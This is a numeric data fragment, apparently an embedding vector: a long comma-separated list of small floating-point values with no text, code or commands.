-0.013908421620726585, 0.05826687067747116, -0.007241258397698402, -0.006705435924232006, 0.007011620327830315, -0.006479625124484301, -0.009223802015185356, -0.006992483977228403, -0.013181233778595924, -0.039497774094343185, -0.005438598338514566, 0.021034860983490944, -0.014222260564565659, -0.027127929031848907, 0.04366188123822212, -0.029761113226413727, -0.03860983997583389, 0.01447486225515604, -0.0078076994977891445, -0.003938295412808657, 0.035027481615543365, 0.02501525729894638, 0.024601908400654793, 0.031230797991156578, -0.009093673899769783, 0.006131340283900499, -0.019519248977303505, -0.0014582027215510607, 0.016962610185146332, 0.003972741309553385, 0.0017557755345478654, -0.010869542136788368, -0.023407788947224617, -0.030159153044223785, 0.004236825276166201, 0.006161958910524845, 0.0013328584609553218, -0.0057256463915109634, 0.002820722758769989, -0.02037656493484974, -0.0027384357526898384, 0.003264690050855279, 0.008205738849937916, -0.030495956540107727, 0.011887605302035809, 0.005767746828496456, -0.002839859342202544, 0.0278321523219347, 0.004776475019752979, -0.01624307595193386, 0.025903191417455673, 0.00794548261910677, 0.05453142151236534, -0.0005449123564176261, 0.006372460629791021, -0.006992483977228403, 0.017896471545100212, 0.007922518998384476, 0.01847822219133377, -0.006705435924232006, -0.04556022211909294, 0.01901404559612274, -0.02259640023112297, -0.008443032391369343, 0.017100393772125244, -0.006043312605470419, 0.024356961250305176, 0.006012693978846073, 0.0026255303528159857, -0.008244012482464314, -0.025505151599645615, -0.009315657429397106, -0.0051745143719017506, -0.002506883814930916, -0.00205334834754467, 0.008244012482464314, -0.00016624850104562938, 0.017268793657422066, -0.005672064144164324, -0.006628890056163073, -0.03695644438266754, -0.001255355658940971, 0.015370451845228672, -0.007792390417307615, -0.0008687979425303638, 0.009361584670841694, 0.008879344910383224, -0.014918829314410686, 0.007103475742042065, -0.00877983495593071, 0.00011637395073194057, -0.011910568922758102, -0.02051434852182865, 0.02411201409995556, -0.02426510490477085, 0.020100999623537064, 0.01664111576974392, 0.0047458563931286335, -0.02686767280101776, 0.021432900801301003, 0.007505342364311218, -0.0002906358859036118, 0.008312903344631195, 0.0042483070865273476, -0.031659457832574844, -0.0024456470273435116, -0.010861887596547604, 0.022443309426307678, -0.007141748908907175, -0.01734534092247486, 0.017973018810153008, 0.008113883435726166, 0.002614048309624195, 0.0426514707505703, -0.014819320291280746, 0.018769096583127975, 0.02092769742012024, 0.01832512952387333, -0.02816895581781864, 0.02166253887116909, 0.019718268886208534, 0.012653065845370293, -0.022290216758847237, 0.01720755733549595, 0.011726858094334602, 0.0027824498247355223, -0.013678783550858498, -0.0014916915679350495, 0.02184624969959259, 0.01306641474366188, 0.008274630643427372, -0.002231318037956953, 0.0333128497004509, -0.004543009679764509, 0.012071316130459309, -0.0115814208984375, -0.0017328117974102497, -0.010050499811768532, -0.010923124849796295, -0.009996917098760605, -0.01981012336909771, -0.001433325232937932, -0.015431688167154789, -0.026408394798636436, -0.013655819930136204, -0.008044992573559284, 0.014214606024324894, -0.015998128801584244, 0.010073463432490826, 0.030955232679843903, 0.0016103379894047976, 0.019197754561901093, 0.027525968849658966, 0.02898034267127514, 0.014719810336828232, -0.01981012336909771, -0.007030756678432226, 0.007214467506855726, 0.022841349244117737, -0.007608679588884115, 0.0037316211964935064, 0.011734512634575367, -0.0030216563027352095, -0.0035632196813821793, 0.011887605302035809, -0.01572256349027157, 0.014849938452243805, 0.007130266632884741, -0.0038923679385334253, -0.015431688167154789, 0.03395583853125572, -0.00774646271020174, -0.005779228638857603, 0.02636246755719185, 0.017054464668035507, -0.0002146878105122596, -0.0008501398260705173, -0.007907208986580372, 0.00014328467659652233, -0.004573627840727568, 0.027786225080490112, -0.0068929740227758884, 0.03008260764181614, -0.010923124849796295, -0.003134561702609062, 0.009346275590360165, -0.009813206270337105, -0.016181839630007744, 0.0034790190402418375, -0.0410286970436573, 0.01608998514711857, 0.0017242003232240677, 0.015332178212702274, -0.010494466871023178, 0.014635609462857246, 0.009330966509878635, -0.009981608018279076, -0.019121209159493446, -0.0048377118073403835, 0.008802798576653004, 0.0037335348315536976, -0.0012122984044253826, 0.009560604579746723, 0.012063661590218544, -0.005055868066847324, 0.04384559020400047, 0.03655840456485748, 0.025505151599645615, 0.013242471031844616, 0.0036722978111356497, 0.007983755320310593, -0.0027575723361223936, -0.012943941168487072, 0.0019404429476708174, 0.005813674069941044, 0.006724572740495205, 0.013181233778595924, 0.03496624529361725, 0.02222898043692112, 0.003945949953049421, -0.012660720385611057, -0.009943335317075253, 0.021708466112613678, -0.022734183818101883, 0.022856658324599266, -0.013632855378091335, 0.009973953478038311, -0.005327606573700905, 0.023055678233504295, -0.015240323729813099, 0.010762377642095089, -0.0019729749765247107, 0.012438736855983734, 0.017605597153306007, 0.011527839116752148, 0.0013031968846917152, 0.01008111797273159, 0.01665642485022545, -0.007646952755749226, 0.012676029466092587, 0.0076584345661103725, -0.011122144758701324, -0.00348284631036222, -0.008810453116893768, 0.012492319568991661, -0.015339832752943039, -0.007302495650947094, 0.007991409860551357, -0.016319623216986656, -0.00765460729598999, -0.002583429915830493, 0.0013338152784854174, -0.00972135178744793, -0.0035727880895137787, -0.013242471031844616, 0.002776708919554949, 0.005469216965138912, -0.00653320737183094, 0.005120932124555111, -0.016962610185146332, 0.0002559509302955121, -0.019580485299229622, -0.007206812966614962, 0.010249519720673561, -0.008994163945317268, 0.0005578295094892383, 0.007363732438534498, -0.015454652719199657, -0.02539798803627491, 0.0010228469036519527, -0.017666833475232124, -0.008557851426303387, 0.0006176311289891601, -0.02499994821846485, 0.001907910918816924, 0.021371664479374886, 0.0095223318785429, -0.005832810886204243, -0.0030369653832167387, 0.004282752983272076, 0.003678038949146867, 0.00015955072012729943, 0.019320229068398476, 0.02071336843073368, 0.010142355225980282, 0.0011922051198780537, 0.0020189026836305857, -0.010150009766221046, 0.009859134443104267, -0.013418526388704777, 0.0034694508649408817, -0.013058760203421116, -0.01869255118072033, 0.014888211153447628, -0.008443032391369343, -0.005641445517539978, 0.003046533791348338, 0.0077617717906832695, 0.001750034629367292, -0.032945431768894196, 0.016350241377949715, 0.0020724849309772253, -0.026301231235265732, -0.010295446962118149, 0.010387302376329899, -0.021968722343444824, 0.0011883778497576714, -0.025076493620872498, -0.021034860983490944, -0.01428349781781435, -0.0027652268763631582, 0.0022925548255443573, -0.024555981159210205, -0.002082053106278181, -0.012147861532866955, -0.007570406887680292, -0.010532739572227001, 0.0015117849688977003, 0.005587863270193338, 0.019886670634150505, -0.01532452367246151, 0.022091196849942207, -0.01827920228242874, -0.017881162464618683, -0.0070231021381914616, -0.0035708744544535875, 0.04148797318339348, -0.0093386210501194, -0.013663474470376968, -0.006146649830043316, 0.020851150155067444, -0.012369845062494278, 0.0005449123564176261, 0.010486812330782413, 0.015538852661848068, 0.020499039441347122, 0.010992016643285751, -0.013525690883398056, -0.0025164522230625153, -0.016350241377949715, -0.002114585367962718, 0.012017733417451382, -0.009667769074440002, 0.005055868066847324, 0.013571619056165218, -0.003102029673755169, 0.024954019114375114, 0.0012218666961416602, 0.0030618428718298674, -0.015064267441630363, -0.018386367708444595, 0.02034594677388668, 0.007248913403600454, 0.01214020699262619, 0.002154771937057376, 0.008726252242922783, 0.00839710421860218, 0.02953147515654564, 0.01306641474366188, -0.007528306450694799, -0.03159821778535843, 0.001831364817917347, 0.02072867751121521, 0.0031058569438755512, -0.0033775954507291317, -0.011060907505452633, -0.0028168954886496067, -0.010984361171722412, -0.00022892060223966837, 0.004389917477965355, -0.009438131004571915, 0.004573627840727568, 0.00016361723828595132, 0.017636215314269066, -0.00793017353862524, -0.017498431727290154, -0.006831737235188484, -0.016901373863220215, -0.004952530842274427, 0.017988327890634537, 0.028857870027422905, 0.011106835678219795, 0.01661049760878086, 0.006066276226192713, 0.006196404807269573, 0.0033603727351874113, -0.010111736133694649, 0.0029757285956293344, 0.012806158512830734, 0.014627954922616482, -0.003842612961307168, 0.02878132462501526, 0.0035555651411414146, -0.003188143949955702, 0.016855444759130478, -0.00373736210167408, -0.002305950503796339, -0.008833416737616062, -0.03120017983019352, -0.00704223895445466, -0.008266976103186607, -0.012025387957692146, 0.008573160506784916, -0.006234677508473396, -0.016135912388563156, 0.011834022589027882, 0.015071921981871128, -0.027908697724342346, -0.004504736512899399, -0.012645411305129528, -0.0017538618994876742, -0.00416027894243598, 0.021249189972877502, 0.0009142471826635301, -0.0031690073665231466, -0.03677273541688919, -0.004401399288326502, 0.026469632983207703, -0.002554725157096982, 0.002240886213257909, -0.014520790427923203, -0.0033182722982019186, -0.02183094061911106, 0.002323173452168703, -0.00704223895445466, 0.018769096583127975, -0.005496008321642876, 0.01334198098629713, 0.005698855035007, -0.012951595708727837, 0.02709731087088585, -0.004439672455191612, -0.008435376919806004, -0.005656755063682795, -0.00926207471638918, 0.020866459235548973, -0.002495402004569769, -0.02669927105307579, 0.0005066393059678376, 0.0006415518000721931, 0.006514071021229029, -0.00011075259681092575, 0.00030355300987139344, -0.017605597153306007, 0.009361584670841694, -0.011336473748087883, 0.003532601287588477, 0.0008606649353168905, 0.0011185294715687633, -0.0026255303528159857, 0.034108929336071014, -0.0009903148747980595, 0.028551684692502022, -0.021004242822527885, -0.000026776175218401477, 0.004776475019752979, -0.011512529104948044, -0.0119488425552845, -0.0016160790110006928, 0.0019509680569171906, 0.022795420140028, 0.008634396828711033, 0.012630102224647999, -0.013908421620726585, -0.001270664855837822, -0.003339322516694665, -0.008940581232309341, 0.01607467606663704, -0.010127045214176178, 0.003473278135061264, -0.01026482880115509, -0.007065202575176954, 0.0038043397944420576, -0.007405832409858704, -0.0002662368060555309, 0.003708657342940569, -0.007233603857457638, -0.014597335830330849, 0.0069389017298817635, -0.003999532200396061, 0.01795770972967148, 0.007803872227668762, 0.005802192259579897, 0.01223206240683794, 0.02654617838561535, 0.016901373863220215, 0.004592764191329479, -0.004627210088074207, -0.008909963071346283, -0.00972135178744793, -0.008588469587266445, 0.0045468369498848915, 0.0010458107572048903, -0.008152157068252563, 0.02089707739651203, -0.01644209586083889, 0.021187953650951385, -0.0035268603824079037, -0.01383952982723713, -0.014704500325024128, -0.0070345839485526085, 0.009889752604067326, 0.00742114195600152, 0.014222260564565659, 0.013671129010617733, 0.002304036868736148, -0.009889752604067326, 0.01775868982076645, 0.017850544303655624, -0.010364338755607605, 0.0005965809687040746, -0.0000011848195526908967, 0.002602566499263048, -0.0009587395470589399, -0.0025336749386042356, -0.026270613074302673, 0.022290216758847237, 0.002173908520489931, 0.005947629921138287, -0.005955284461379051, 0.02201465144753456, 0.01924368366599083, -0.011030289344489574, 0.023821137845516205, 0.019304919987916946, 0.02183094061911106, -0.013495072722434998, 0.025321440771222115, 0.013655819930136204, 0.00924676563590765, 0.007417314685881138, 0.003379509085789323, -0.02688298188149929, 0.022749492898583412, 0.010425575077533722, 0.0011309682158753276, -0.00991271622478962, 0.01428349781781435, 0.013280743733048439, 0.006812600418925285, 0.011619693599641323, -0.013877803459763527, 0.018432294949889183, -0.01411509606987238, 0.006827909965068102, 0.00013479284825734794, 0.012813813053071499, -0.03214935213327408, -0.006915937643498182, -0.015829728916287422, -0.0032321580220013857, -0.0041181789711117744, 0.008351176977157593, -0.013028142042458057, -0.003779462305828929, 0.015936892479658127, 0.011849332600831985, -0.0002667152148205787, -0.005071177612990141, 0.01026482880115509, -0.0051247598603367805, -0.007643125485628843, 0.015202050097286701, 0.003882799530401826, 0.004600419197231531, -0.01119869016110897, 0.008511923253536224, -0.004037805367261171, -0.009476403705775738, -0.011994769796729088, 0.0020074208732694387, 0.010394956916570663, -0.007505342364311218, 0.02444881573319435, 0.012515283189713955, -0.008909963071346283, -0.0002015314530581236, -0.01402324065566063, 0.00329339480958879, 0.014360043220221996, 0.03870169445872307, 0.007214467506855726, 0.012622447684407234, -0.030296936631202698, 0.0026427533011883497, 0.01093077939003706, -0.014819320291280746, -0.00016373684047721326, -0.01391607616096735, -0.0056108273565769196, 0.004206206649541855, -0.01827920228242874, 0.0031728348694741726, -0.0009482144960202277, 0.0016065107192844152, -0.0007673744112253189, 0.0010218900861218572, -0.005021422635763884, -0.012331572361290455, 0.0016065107192844152, 0.0138242207467556, 0.006648026406764984, -0.010249519720673561, -0.024020157754421234, 0.004053114447742701, -0.020835841074585915, 0.0019289610208943486, 0.009438131004571915, -0.0077158440835773945, 0.01447486225515604, -0.01734534092247486, -0.003720139153301716, -0.020100999623537064, 0.024525361135601997, 0.01567663624882698, -0.0007774210534989834, -0.015768490731716156, -0.009407512843608856, 0.006383942440152168, 0.01901404559612274, -0.011030289344489574, -0.011527839116752148, -0.000016415544450865127, 0.009185528382658958, 0.008420067839324474, -0.001809357781894505, -0.011175726540386677, -0.01962641254067421, -0.0023958920501172543, 0.018753787502646446, 0.023239387199282646, 0.028429212048649788, 0.009690732695162296, -0.013380253687500954, 0.018815025687217712, 0.006341842003166676, -0.006693954113870859, -0.009836170822381973, -0.006850873585790396, -0.001604597084224224, 0.007268049754202366, -0.0045468369498848915, -0.0093386210501194, -0.004608073737472296, -0.004868330433964729, 0.002640839433297515, 0.003255121875554323, 0.0041105239652097225, -0.0007903382065705955, -0.02781684324145317, -0.030572501942515373, 0.01308172382414341, -0.001965320436283946, 0.026990145444869995, -0.02633184939622879, 0.01608998514711857, -0.0005927536403760314, -0.0013797429855912924, -0.017973018810153008, -0.009032436646521091, 0.01662580668926239, -0.027158547192811966, 0.0016447837697342038, -0.010846578516066074, -0.0095223318785429, 0.012821467593312263, -0.009790242649614811, 0.022305525839328766, 0.010402611456811428, 0.003425436792895198, 0.008052647113800049, 0.011956497095525265, 0.0015462306328117847, -0.008343522436916828, 0.004064596723765135, -0.010494466871023178, -0.004960185382515192, 0.0064451792277395725, 0.036711495369672775, -0.0037143982481211424, -0.017452504485845566, -0.02202996052801609, 0.005641445517539978, 0.016870753839612007, 0.022749492898583412, 0.00593614811077714, 0.010578667744994164, -0.026592105627059937, -0.00783449038863182, 0.01130585465580225, 0.010593976825475693, -0.02239738032221794, 0.00705754803493619, -0.010440884158015251, 0.008795144036412239, 0.026745198294520378, -0.015523543581366539, -0.0028035000432282686, 0.02672988921403885, 0.004497081972658634, 0.005649100057780743, -0.008894653990864754, -0.027571896091103554, -0.01393138524144888, 0.024540672078728676, -0.0018294511828571558, -0.015768490731716156, -0.01642678678035736, 0.003934468142688274, -0.014367697760462761, -0.020284710451960564, -0.01981012336909771, 0.023040367290377617, -0.008795144036412239, 0.02429572306573391, 0.0036263703368604183, 0.0031517846509814262, 0.005392671097069979, 0.0008525318698957562, -0.022290216758847237, -0.020667439326643944, -0.015316869132220745, -0.014872902072966099, 0.01570725440979004, 0.0024265104439109564, -0.00941516738384962, -0.017819926142692566, 0.01814141869544983, -0.01901404559612274, 0.00047315043048001826, 0.010662867687642574, 0.0003131212724838406, -0.007072857115417719, 0.0019461839692667127, 0.020805222913622856, 0.001560583128593862, -0.024954019114375114, 0.004998458549380302, -0.005212787538766861, -0.00024219656188506633, -0.008994163945317268, -0.007539788261055946, 0.013518036343157291, -0.01809549145400524, -0.017452504485845566, -0.021938104182481766, -0.019458012655377388, -0.009774933569133282, 0.02369866520166397, -0.00876452587544918, 0.00729101337492466, 0.0029623331502079964, -0.0026255303528159857, 0.01317357923835516, 0.012101934291422367, 0.004152624402195215, -0.005354397930204868, 0.004887466784566641, -0.0010381561005488038, 0.0022351453080773354, -0.008152157068252563, -0.016396168619394302, -0.009461094625294209, -0.006429870147258043, -0.02281072922050953, -0.01754436083137989, 0.006112203933298588, -0.01702384650707245, 0.002924059983342886, -0.004627210088074207, 0.010593976825475693, 0.0030694976449012756, 0.006364806089550257, -0.02561231702566147, -0.01148956548422575, -0.0115814208984375, 0.012147861532866955, 0.0192283745855093, 0.010616940446197987, 0.012553555890917778, -0.025275513529777527, -0.010808305814862251, -0.0006147606763988733, 0.002526020398363471, 0.01829451136291027, -0.0008807582780718803, -0.024173250421881676, 0.027158547192811966, -0.021187953650951385, 0.023484336212277412, 0.004535354673862457, 0.010249519720673561, -0.02204526960849762, 0.006192577537149191, 0.009001818485558033, 0.017284102737903595, 0.0071379211731255054, -0.012630102224647999, 0.016503334045410156, 0.004037805367261171, -0.027908697724342346, 0.010058154352009296, 0.03741572052240372, -0.010616940446197987, 0.02354557253420353, 0.019549867138266563, 0.008014373481273651, 0.008389449678361416, 0.014000277034938335, 0.00794548261910677, -0.00904774572700262, 0.01996321603655815, 0.010065808892250061, -0.011214000172913074, 0.011994769796729088, -0.008925272151827812, -0.010150009766221046, 0.0005377361667342484, 0.0028149818535894156, -0.010984361171722412, -0.004623382817953825, -0.009032436646521091, 0.008014373481273651, 0.00907836388796568, 0.0021337217185646296, 0.03563985228538513, -0.013395562767982483, -0.0010295447427779436, -0.01752905175089836, 0.016028746962547302, 0.009950989857316017, 0.012813813053071499, 0.004711410962045193, -0.013196542859077454, -0.0007817267905920744, 0.002864736830815673, -0.013410871848464012, -0.003980395849794149, -0.0036225428339093924, 0.0005511317285709083, 0.0027384357526898384, -0.028873179107904434, 0.04252899810671806, -0.003723966423422098, -0.0075742341578006744, -0.005247233435511589, -0.01889157108962536, 0.008427722379565239, 0.016549261286854744, -0.020835841074585915, 0.013586928136646748, -0.026270613074302673, -0.008289939723908901, 0.022121815010905266, 0.015998128801584244, -0.027724988758563995, -0.02317815087735653, 0.005163032561540604, -0.014321770519018173, -0.005094141233712435, -0.003840699326246977, 0.002108844229951501, 0.010012226179242134, -0.03233306109905243, 0.004451154265552759, -0.014214606024324894, 0.0051745143719017506, -0.026239994913339615, 0.015332178212702274, 0.04252899810671806, -0.0340476930141449, 0.008611433207988739, -0.0037718077655881643, -0.009009473025798798, 0.024188559502363205, 0.008680325001478195, 0.007623989135026932, -0.0062576415948569775, 0.0012591829290613532, -0.0033354952465742826, 0.0020897078793495893, 0.012630102224647999, 0.01131351012736559, -0.005664409603923559, -0.023652736097574234, -0.006460488773882389, -0.01981012336909771, -0.018922189250588417, -0.0058175018057227135, -0.000013866500921722036, -0.005939975380897522, -0.005166859831660986, -0.007585715968161821, 0.02542860619723797, -0.0042483070865273476, 0.04390682652592659, -0.014589681290090084, -0.012216753326356411, -0.01380891166627407, 0.006575307808816433, -0.005683545954525471, -0.010058154352009296, -0.010165318846702576, -0.01374767441302538, -0.008098574355244637, 0.01150487456470728, -0.001077385968528688, -0.0034962419886142015, -0.0043631261214613914, -0.01026482880115509, -0.009943335317075253, 0.006862355396151543, -0.003501982893794775, -0.006119858473539352, 0.0029278872534632683, -0.004286580253392458, 0.005029077176004648, 0.01259948406368494, 0.025505151599645615, 0.0035536515060812235, -0.0023557054810225964, -0.008205738849937916, 0.0021318080835044384, 0.004562146030366421, -0.011420674622058868, 0.004554491490125656, -0.002275332110002637, -0.0014228001236915588, 0.02019285410642624, -0.002070571295917034, 0.02408139407634735, 0.006781982257962227, -0.04442734271287918, 0.019886670634150505, -0.010287792421877384, 0.001490734750404954, -0.0025757753755897284, 0.014689191244542599, -0.0015749355079606175, 0.009315657429397106, -0.019748887047171593, -0.0140079315751791, -0.009652459993958473, 0.007845972664654255, 0.0046425191685557365, -0.01513315923511982, -0.03153698146343231, 0.00848895963281393, -0.0031843166798353195, 0.02447943389415741, -0.007298667915165424, 0.0015022166771814227, 0.007581888698041439, 0.011466601863503456, 0.0060509671457111835, -0.003949777223169804, 0.023469025269150734, 0.00895589031279087, 0.01532452367246151, 0.00971369631588459, -0.017330031841993332, -0.005362052470445633, 0.01997852511703968, -0.019473321735858917, 0.005943802651017904, 0.014980066567659378, -0.0009429519413970411, -0.01232391782104969, 0.0014065341092646122, -0.02593380957841873, 0.0015108281513676047, 0.03802809119224548, 0.003624456701800227, -0.017682142555713654, 0.017850544303655624, 0.0192283745855093, 0.00012893229722976685, 0.013058760203421116, -0.0032589491456747055, 0.0027862770948559046, -0.00653320737183094, 0.002924059983342886, 0.013426180928945541, -0.009797897189855576, -0.01962641254067421, -0.0021605128422379494, -0.018049564212560654, 0.004833884537220001, 0.005461562424898148, -0.013671129010617733, -0.006089240312576294, 0.002022729953750968, 0.015316869132220745, 0.0035995792131870985, -0.012744921259582043, -0.0016974091995507479, 0.0008501398260705173, -0.002761399606242776, -0.019871361553668976, -0.00906305480748415, -0.004393744748085737, 0.015179086476564407, 0.007428796496242285, 0.019917288795113564, -0.00013287919864524156, -0.0004329637158662081, 0.003121166257187724, -0.01607467606663704, -0.01449017133563757, 0.022274907678365707, -0.004738201852887869, 0.020453110337257385, -0.0016294745728373528, -0.021019551903009415, -0.013877803459763527, 0.010502121411263943, -0.004860675893723965, -0.021142026409506798, -0.0009797897655516863, 0.005614654626697302, 0.0020303844939917326, -0.009928025305271149, -0.0031575255561619997, -0.009690732695162296, 0.032210588455200195, 0.009790242649614811, -0.018401676788926125, 0.010555703192949295, 0.004711410962045193, 0.01393138524144888, 0.012936286628246307, 0.006276777945458889, 0.007581888698041439, 0.00037603257806040347, -0.010555703192949295, -0.006644199136644602, 0.001040069735608995, 0.007302495650947094, 0.0028322048019617796, -0.013563964515924454, 0.01644209586083889, -0.02839859388768673, 0.006988656707108021, -0.021739084273576736, 0.011037943884730339, 0.015477616339921951, -0.005052040796726942, -0.01847822219133377, -0.0340476930141449, -0.0006759975221939385, 0.007206812966614962, -0.031307343393564224, 0.022121815010905266, 0.005029077176004648, 0.013671129010617733, 0.007884245365858078, -0.003988050390034914, 0.018815025687217712, 0.016533952206373215, -0.011244618333876133, 0.0028054136782884598, 0.003398645669221878, -0.00035976653452962637, -0.0050788321532309055, -0.014773392118513584, -0.03980395942926407, 0.005652927327901125, 0.03524181246757507, 0.01569194532930851, 0.019840741530060768, -0.01752905175089836, -0.007252740673720837, 0.002880045911297202, -0.025489842519164085, 0.009001818485558033, 0.009269729256629944, 0.02150944620370865, 0.003291481174528599, 0.0030962887685745955, -0.018998734652996063, -0.020958315581083298, 0.030036678537726402, -0.0048491936177015305, 0.0069389017298817635, 0.012844431214034557, -0.011895259842276573, -0.0037871170789003372, 0.0005367793492041528, -0.022672947496175766, 0.024800928309559822, 0.02337717078626156, -0.010724104940891266, 0.0233465526252985, -0.00016840135504025966, -0.000598016194999218, 0.004833884537220001, -0.010218900628387928, -0.0026427533011883497, -0.011191035620868206, -0.01390076708048582, 0.018570076674222946, -0.009484058246016502, -0.005407980177551508, 0.015814417973160744, -0.013234816491603851, 0.007432623766362667, 0.007191503420472145, -0.016947301104664803, -0.006479625124484301, 0.0011443637777119875, -0.009162564761936665, -0.033343467861413956, 0.01608998514711857, 0.0034924147184938192, 0.00027724032406695187, 0.0030618428718298674, -0.004439672455191612, -0.004424362909048796, -0.018355747684836388, 0.028628231957554817, -0.016151221469044685, -0.0038043397944420576, -0.00537353428080678, -0.001670618075877428, -0.016013437882065773, 0.0138242207467556, 0.004799438640475273, 0.005897874943912029, 0.0007262308499775827, 0.009438131004571915, 0.01232391782104969, 0.0010104081593453884, 0.016962610185146332, -0.03380274772644043, 0.00887169037014246, 0.006781982257962227, -0.01530921459197998, 0.007405832409858704, -0.0031556119211018085, -0.004298062063753605, 0.0008333954028785229, -0.010685832239687443, 0.011397710070014, 0.02349964529275894, -0.022718874737620354, 0.016365550458431244, 0.008067956194281578, -0.001187420915812254, 0.009101328440010548, -0.004217688459903002, 0.005710337311029434, -0.0010687746107578278, 0.010402611456811428, -0.004229170735925436, -0.0009108982631005347, 0.015531198121607304, -0.0028149818535894156, -0.013893112540245056, 0.026025665923953056, 0.004742029123008251, 0.00047123676631599665, 0.0030637565068900585, 0.004125833511352539, 0.022504545748233795, -0.02206057868897915, -0.019335538148880005, 0.01755966991186142, 0.009208492934703827, -0.01814141869544983, -0.005117104854434729, -0.003159439191222191, 0.01250762864947319, -0.014451898634433746, 0.006724572740495205, -0.01408447790890932, -0.014367697760462761, 0.00839710421860218, 0.00886403489857912, 0.0038942815735936165, -0.007868936285376549, 0.00785362720489502, 0.0066518536768853664, 0.006031830795109272, -0.004531527403742075, -0.001396009000018239, -0.004447326995432377, -0.014903520233929157, -0.010195937007665634, 0.009797897189855576, -0.003930640872567892, 0.009767279028892517, -0.002422683173790574, -0.0035345149226486683, -0.01627369597554207, 0.013051105663180351, -0.012270336039364338, -0.0012543987249955535, -0.0060968948528170586, -0.018018946051597595, 0.014337079599499702, 0.0031575255561619997, 0.01130585465580225, -0.007030756678432226, -0.0025317613035440445, -0.00035091591416858137, 0.006242332514375448, 0.012499974109232426, -0.0003262776299379766, 0.013464454561471939, 0.0006702565588057041, -0.0031536982860416174, -0.023530263453722, -0.027372876182198524, 0.007294840645045042, -0.01391607616096735, -0.025474533438682556, 0.008565505966544151, 0.0029298008885234594, -0.012484665028750896, -0.00616961345076561, -0.002087794244289398, 0.019764196127653122, 0.016870753839612007, 0.012813813053071499, -0.015179086476564407, -0.026071593165397644, -0.01174982264637947, -0.007524479180574417, 0.0023308279924094677, -0.01028013788163662, -0.0032436398323625326, -0.007386696059256792, -0.0002987688931170851, 0.001976802246645093, -0.006345669738948345, 0.004401399288326502, -0.0003126428637187928, 0.002374841831624508, -0.027342258021235466, -0.024555981159210205, -0.012040697038173676, 0.04112055152654648, 0.014076823368668556, 0.0032857402693480253, 0.011321164667606354, 0.010724104940891266, -0.009101328440010548, -0.0025221931282430887, -0.009790242649614811, 0.011458947323262691, -0.013058760203421116, -0.00029183190781623125, -0.010211246088147163, 0.010946088470518589, 0.003444573376327753, -0.01269133947789669, -0.007884245365858078, -0.018263893201947212, 0.00935393013060093, 0.013165924698114395, 0.003115425119176507, -0.007773253601044416, 0.01148956548422575, -0.0026331848930567503, -0.003132648067548871, -0.009966298937797546, 0.009874443523585796, 0.016717663034796715, 0.007363732438534498, 0.008052647113800049, -0.0058098467998206615, 0.02222898043692112, 0.021953413262963295, -0.004868330433964729, 0.020468419417738914, -0.007777080871164799, -0.010295446962118149, -0.005128587130457163, -0.006690126843750477, -0.009108982980251312, 0.018906880170106888, 0.014773392118513584, 0.024372270330786705, -0.019534558057785034, 0.008381795138120651, -0.007712016813457012, 0.0009587395470589399, -0.03355779871344566, -0.016105294227600098, 0.020085690543055534, -0.006429870147258043, -0.00537353428080678, 0.0014084477443248034, 0.020621512085199356, -0.03493562713265419, -0.03159821778535843, 0.0065944441594183445, -0.0016112948069348931, 0.018401676788926125, -0.011236963793635368, 0.0037622395902872086, 0.030710285529494286, 0.022458618506789207, 0.002688680775463581, 0.010831269435584545, 0.020208163186907768, -0.0015864174347370863, -0.0010850406251847744, 0.009889752604067326, 0.005316124763339758, 0.007643125485628843, 0.012094279751181602, 0.013831875286996365, 0.012545901350677013, -0.012744921259582043, -0.005017594899982214, -0.0052855066023766994, 0.0183098204433918, 0.0034598824568092823, 0.007252740673720837, 0.014183987863361835, 0.005266369786113501, 0.01679420843720436, 0.016503334045410156, 0.005492180585861206, -0.007363732438534498, -0.019932597875595093, -0.001182636828161776, 0.006529380101710558, 0.012943941168487072, 0.038395509123802185, -0.002723126672208309, -0.004565973300486803, 0.0030025197193026543, -0.005982075817883015, -0.007153230719268322, -0.0017710847314447165, -0.005392671097069979, 0.009239111095666885, 0.01680951751768589, 0.02167784795165062, 0.0032015396282076836, -0.008152157068252563, 0.008795144036412239, 0.0009429519413970411, 0.009774933569133282, 0.006338014733046293, 0.00774646271020174, -0.006973347160965204, 0.0009989262325689197, 0.00011452010221546516, 0.010035189799964428, 0.0006669076392427087, 0.0017682142788544297, -0.003649333957582712, -0.01550823450088501, -0.0005004199338145554, 0.031873784959316254, -0.005997384898364544, -0.001780653023160994, -0.01999383419752121, -0.005293161142617464, -0.017253484576940536, -0.02986827865242958, 0.03343532606959343, 0.0035249467473477125, 0.024173250421881676, -0.0037048300728201866, -0.006334187462925911, 0.01174982264637947, 0.02486216463148594, -0.008925272151827812, -0.0045583187602460384, 0.007436451036483049, 0.021785013377666473, -0.012255026027560234, 0.012477009557187557, 0.006192577537149191, -0.014038549736142159, 0.014911174774169922, -0.009116637520492077, -0.004742029123008251, 0.013188888318836689, 0.007298667915165424, -0.020131617784500122, -0.01757497899234295, 0.015048958361148834, -0.0028532547876238823, 0.01008111797273159, -0.018080182373523712, -0.020422492176294327, 0.0037641532253473997, -0.01205600704997778, -0.0038043397944420576, -0.018386367708444595, -0.008044992573559284, 0.005308470223098993, -0.01475042849779129, -0.020070379599928856, -0.010785342194139957, 0.0012543987249955535, -0.0036435930524021387, 0.006150477100163698, 0.004076078534126282, -0.019733577966690063, -0.010349028743803501, -0.005541935563087463, -0.008680325001478195, -0.0012170826084911823, 0.005105623044073582, -0.012484665028750896, 0.009851479902863503, 0.009928025305271149, -0.011925878003239632, 0.015179086476564407, 0.03487439081072807, 0.0002633663243614137, 0.01827920228242874, 0.006552343722432852, -0.006131340283900499, 0.0377219058573246, 0.00338525022380054, 0.005327606573700905, -0.006184922531247139, -0.0022083541844040155, 0.011405364610254765, -0.0005324736121110618, -0.0001723482710076496, -0.013426180928945541, -0.005304642952978611, -0.0019241769332438707, -0.0027078173588961363, 0.01141301915049553, -0.001314678811468184, -0.0030522746965289116, 0.02258109115064144, -0.0009616100578568876, 0.022305525839328766, -0.005220442079007626, -0.003679952584207058, 0.012071316130459309, 0.017804617062211037, -0.01270664855837822, -0.021723775193095207, 0.009376893751323223, 0.006039485335350037, -0.005017594899982214, 0.00517834210768342, -0.010900161229074001, -0.03511933982372284, -0.005664409603923559, 0.014314115978777409, -0.008703288622200489, -0.0029623331502079964, 0.01165796723216772, 0.02112671546638012, -0.02708200179040432, 0.004232998006045818, 0.013472109101712704, 0.03563985228538513, 0.020238781347870827, -0.0022217498626559973, 0.012920977547764778, -0.014145714230835438, 0.010953743010759354, 0.02467845380306244, 0.000358331308234483, -0.018554767593741417, -0.020805222913622856, -0.0007568493019789457, -0.014413625933229923, -0.00812919344753027, 